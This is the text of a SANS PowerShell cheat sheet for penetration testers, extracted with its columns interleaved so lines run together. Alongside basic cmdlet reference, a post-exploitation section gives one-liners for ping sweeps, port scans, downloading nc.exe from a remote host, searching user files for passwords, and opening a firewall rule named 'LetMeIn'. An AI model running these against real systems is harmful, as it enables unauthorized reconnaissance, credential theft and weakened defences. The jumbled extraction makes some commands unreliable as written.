Useful Cmdlets (and aliases) PowerShell for Pen-Tester Post-Exploitation PowerShell Get a directory listing (ls, dir, gci): Conduct a ping sweep: PS C:\> Get-ChildItem PS C:\> 1..255 | % {echo "10.10.10.$_"; Cheat Sheet ping -n 1 -w 100 10.10.10.$_ | Select- v. 4.0 Copy a file (cp, copy, cpi): String ttl} PS C:\> Copy-Item src.txt dst.txt POCKET REFERENCE Conduct a port scan: GUIDE
Move a file (mv, move, mi): PS C:\> 1..1024 | % {echo ((new-object http://www.sans.org PS C:\> Move-Item src.txt dst.txt Net.Sockets.TcpClient).Connect("10.10.10 .10",$_)) "Port $_ is open!"} 2>$null Find text within a file: Purpose PS C:\> Select-String –path c:\users Fetch a file via HTTP (wget in PowerShell): \*.txt –pattern password PS C:\> (New-Object The purpose of this cheat sheet is to PS C:\> ls -r c:\users -file | % System.Net.WebClient).DownloadFile("http describe some common options and {Select-String -path $_ -pattern ://10.10.10.10/nc.exe","nc.exe") techniques for use in Microsoft’s password} PowerShell. Find all files with a particular name: Display file contents (cat, type, gc): PS C:\> Get-ChildItem "C:\Users\" - PS C:\> Get-Content file.txt recurse -include *passwords*.txt
Get present directory (pwd, gl): Get a listing of all installed Microsoft Hotfixes: PowerShell Overview PS C:\> Get-Location PS C:\> Get-HotFix PowerShell Background
Get a process listing (ps, gps): Navigate the Windows registry: PowerShell is the successor to command.com, PS C:\> Get-Process PS C:\> cd HKLM:\ cmd.exe and cscript. Initially released as a PS HKLM:\> ls separate download, it is now built in to all modern Get a service listing: versions of Microsoft Windows. PowerShell PS C:\> Get-Service List programs set to start automatically in the registry: syntax takes the form of verb-noun patterns PS C:\> Get-ItemProperty HKLM:\SOFTWARE implemented in cmdlets. Formatting output of a command (Format-List): \Microsoft\Windows\CurrentVersion\run PS C:\> ls | Format-List –property Launching PowerShell name Convert string from ascii to Base64: PS C:\> PowerShell is accessed by pressing Start -> Paginating output: [System.Convert]::ToBase64String([System typing powershell and pressing enter. PS C:\> ls –r | Out-Host -paging .Text.Encoding]::UTF8.GetBytes("PS Some operations require administrative privileges FTW!")) and can be accomplished by launching Get the SHA1 hash of a file: PowerShell as an elevated session. You can PS C:\> Get-FileHash -Algorithm SHA1 List and modify the Windows firewall rules: launch an elevated PowerShell by pressing Start - file.txt PS C:\> Get-NetFirewallRule –all > typing powershell and pressing Shift-CTRL- PS C:\> New-NetFirewallRule -Action Enter. Exporting output to CSV: Allow -DisplayName LetMeIn - Additionally, PowerShell cmdlets can be called PS C:\> Get-Process | Export-Csv RemoteAddress 10.10.10.25 from cmd.exe by typing: powershell -c procs.csv "
Syntax Getting Help 5 PowerShell Essentials
Cmdlets are small scripts that follow a dash- To get help with help: Concept What’s it A Handy Alias separated verb-noun convention such as "Get- PS C:\> Get-Help Do? Process". PS C:\> Get-Help Shows help & PS C:\> help To read cmdlet self documentation: [cmdlet] - examples [cmdlet] - Similar Verbs with Different Actions: PS C:\> Get-Help
Where-Object condition (alias or ): To expand an alias into a full name: where ? PS C:\> Get-Process | Where-Object PS C:\> alias
To get a list of all available cmdlets: PS C:\> 1..10 PS C:\> Get-Command Efficient PowerShell PS C:\> 1..10 | % {echo "Hello!"}
Tab completion: Get-Command supports filtering. To filter cmdlets Creating and listing variables: PS C:\> get-child